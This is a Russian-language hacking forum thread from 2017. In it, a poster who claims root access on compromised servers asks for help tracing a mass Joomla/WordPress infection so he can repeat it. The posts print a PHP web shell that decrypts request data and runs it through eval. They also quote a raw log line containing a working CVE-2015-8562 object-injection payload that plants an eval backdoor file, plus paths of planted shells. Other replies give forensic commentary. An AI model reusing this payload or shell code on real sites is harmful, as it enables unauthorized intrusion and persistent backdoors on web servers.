ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |

10.03.2017, 05:50
|
|
Guest
Сообщений: n/a
Провел на форуме: 5963
Репутация:
0
|
|
Охота за хакером!
ОЧЕНЬ ИНЕРЕСНАЯ ТЕМА, КОПАЮ УЖЕ НЕДЕЛЮ.....
п1.
вобщем летом 2016 были атакованы миллионы сайтов joomla и wp
https://blog.sucuri.net/2015/11/jque...-websites.html
А так же:
в joomla прописан супер пользователь Service без мыла с правами супер админа и логин вида
joomla.user.helper.8r4KW - пароль не брутится
на всех линейках до последней версии !!! 1.5 , 2.5 и 3.6.5
где прописан такой пользователь, есть вирус п.1
пользователь заригистрирован
в j15 - в октябре 2016
в 3 - в январе 2017
А ТАКЖЕ: практически везде есть такой шелл.
http://www.bugscan.net/combbs/topics/476/template/
есть руты 6 серверов, где встречаются пользователи
на 1 сервере есть логи с июня 2016
есть рут одного из серваков, который присутствует в файле query.min.php (который инжектит вирус п.1)
раскопав точку проникновения, можно повторить п.1
кто со мной - пишите в личку.
#346
|
|
|
|

11.03.2017, 09:59
|
|
Guest
Сообщений: n/a
Провел на форуме: 1565
Репутация:
0
|
|
охота, это хорошее дело...
|
|
|
|

11.03.2017, 10:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 567539
Репутация:
72
|
|
А ты случайно не казачок ли засланный?
|
|
|
|

11.03.2017, 13:15
|
|
Guest
Сообщений: n/a
Провел на форуме: 97867
Репутация:
52
|
|
Лолирую с топика. Если не знал, то массовый взлом сайтов - обычное явление на шаред-хостинге. А если выражаться точнее то это баян баянистый. Этот процесс происходит уже лет 10 наверно. Из своего опыта могу сказать, что минимум 10% всех сайтов на жумле и вордпрессе уже взломаны кем-то.
Малварь распространяется автоматически. Залился вирус на сайт и тут-же этот вирус начинает сканировать другие сайты и так до бесконечности.
Если ты думал, что открыл Америку то ошибаешься. Смотреть как ломают говносайты другие и повторять за ними - этим уже занимаются тысячи кулхацкеров.
|
|
|
|

12.03.2017, 06:54
|
|
Guest
Сообщений: n/a
Провел на форуме: 5963
Репутация:
0
|
|
Сообщение от pas9x
pas9x said:
↑
Лолирую с топика. Если не знал, то массовый взлом сайтов - обычное явление на шаред-хостинге. А если выражаться точнее то это баян баянистый. Этот процесс происходит уже лет 10 наверно. Из своего опыта могу сказать, что минимум 10% всех сайтов на жумле и вордпрессе уже взломаны кем-то.
Малварь распространяется автоматически. Залился вирус на сайт и тут-же этот вирус начинает сканировать другие сайты и так до бесконечности.
Если ты думал, что открыл Америку то ошибаешься. Смотреть как ломают говносайты другие и повторять за ними - этим уже занимаются тысячи кулхацкеров.
Да ты гений просто, 'залился вирус на сайт'. Ясен *** что вручную на миллионы сайтов никто не вкачивал, вот меня и интересует техническая сторона именно этого случая.
Я тоже вслед залился и зарутал некоторые сервера, нужна помощь в расшифровке - логов и файлов, чтобы понять как он залился.
|
|
|
|

12.03.2017, 06:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 5963
Репутация:
0
|
|
к примеру как работает это шелл
$value) {
$data = $value;
$data_key = $key;
}
if(!$data) {
foreach($_POST as $key => $value) {
$data = $value;
$data_key = $key;
}
}
$data = @unserialize(sh_decrypt(@base64_decode( $data ) , $data_key ));
if (isset($data["ak"]) && $auth == $data["ak"]) {
if ($data["a"] == "i") {
$i = Array("pv" => @phpversion() , "sv" => "1.0-1" , );
echo @serialize($i);
}
elseif ($data["a"] == "e") {
eval($data["d"]);
}
}
?>
|
|
|
|

12.03.2017, 09:31
|
|
Guest
Сообщений: n/a
Провел на форуме: 97867
Репутация:
52
|
|
Сообщение от nitupme
nitupme said:
↑
Да ты гений просто, 'залился вирус на сайт'.
А что такого я сказал? Всё именно так. Просто вирус, просто залился, просто на говносайт. Вот и всё. Банальный eval() которому на выполнение подают код расксореный ключём $GLOBALS["auth"]. Кстати, судя по коду писал его нуб.
Сообщение от nitupme
nitupme said:
↑
чтобы понять как он залился
Ага. Чтобы понять как он залился и начать заливать самому, да?
Понять как он залился после того как он уже залился ты не сможешь. Потому что веб-сервер логирует только айпишник, юзер-агент и URI запроса. В большинстве случаев http-запрос на выполнение кода отправляется POST-запросом. В лог попадают только GET-параметры а набор POST-параметров (по которым и можно понять как взломали сайт) не логируется.
Можно только сделать honeypot на жумле который будет логировать все http-запросы со всеми их параметрами. Но это превентивная мера а ты предлагаешь изучать последствия уже взломанных сайтов.
Сообщение от nitupme
nitupme said:
↑
нужна помощь в расшифровке - логов и файлов
Логи тебе ничего не дадут по причине вышесказанного. Можно только найти URI по которому был сделан POST-запрос и, если повезёт, то он будет специфическим и по нему можно будет нагуглить описание дыры в жумле. В самом идеальном и невероятном случае сайт взломан GET-запросом, при этом естественно его параметры попадут в лог, но это крайняя редкость.
Если ты собрался рассылать малварь по инэту то зря стараешься. Проще не смотреть как делает кто-то а находить топовые уязвимости и сканировать веб по ним.
|
|
|
|

12.03.2017, 11:52
|
|
Guest
Сообщений: n/a
Провел на форуме: 5963
Репутация:
0
|
|
вот тут hxxp://rniiap.ru/forum/profile/1769-joomla-user-helper-cisev.html - последняя версия между прочем - является супердмином, созданным в результате запроса к базе данных.
при создании было обращение к файлу на серваке. В логах это пишется, к какому файлу было обращение.
этот юзер нигде никогда не заходил
ниже - сайт другой, версия другая, но юзер - аналогичный
между прочим вот твой редкий случай - вот он заливает шелл НО ЭТО БЫЛ НЕ ОН ! это CVE-2015-8562 и не работает на этом серваке...
========================
"GET / HTTP/1.1" 200 43723 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"f c\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\ 0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"Simp lePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriver Mysql\":0:{}s:8:\"feed_url\";s:237:\"file_put_cont ents($_SERVER[\"DOCUMENT_ROOT\"].chr(47).\"admim.php\",\"|=|\\x3C\".chr(63).\"php \\x24mujj=\\x24_POST['gtr'];if(\\x24mujj!=''){\\x24xsser=base64_decode(\\x24_ POST['z0']);@eval(\\\"\\\\\\x24safedg=\\x24xsser;\\\");}\"); JFactory::getConfig();exit;\";s:19:\"cache_name_fu nction\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"c ache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i: 1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1; }~\xd9"
=====================
отстальные запросы были:
"GET /administrator/components/com_installer/akdjxnk/rxttekb.php 6B
"GET /components/com_rokquickcart/assets/gallery45.php
"GET /images/stories/postelnie/TWINS/dir.php
"GET /includes/js/jscalendar-1.0/session.php
"GET /media/shop/admin_files/html/admin.function_form.php
"GET /modules/mod_newsflash/helper.php
"GET /modules/mod_virtuemart/vm_transmenu/img/javascript.php
"POST /administrator/components/com_categories/toolbar.categories.html.php
"POST /administrator/components/com_config/toolbar.config.html.php
"POST /administrator/components/com_installer/akdjxnk/rxttekb.php
"POST /components/com_poll/assets/plugin27.php
"POST /components/com_rokquickcart/assets/gallery45.php
|
|
|
|

15.03.2017, 16:22
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от nitupme
nitupme said:
↑
к примеру как работает это шелл
$value) {
$data = $value;
$data_key = $key;
}
if(!$data) {
foreach($_POST as $key => $value) {
$data = $value;
$data_key = $key;
}
}
$data = @unserialize(sh_decrypt(@base64_decode( $data ) , $data_key ));
if (isset($data["ak"]) && $auth == $data["ak"]) {
if ($data["a"] == "i") {
$i = Array("pv" => @phpversion() , "sv" => "1.0-1" , );
echo @serialize($i);
}
elseif ($data["a"] == "e") {
eval($data["d"]);
}
}
?>
Это снифер по кукам и пост запросам с элементом бэгдора. цель шифрования для защиты уже перехваченных данных от сторонних глаз, следовательно данные могут иметь весомое значение! тут явно код не закончен.
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|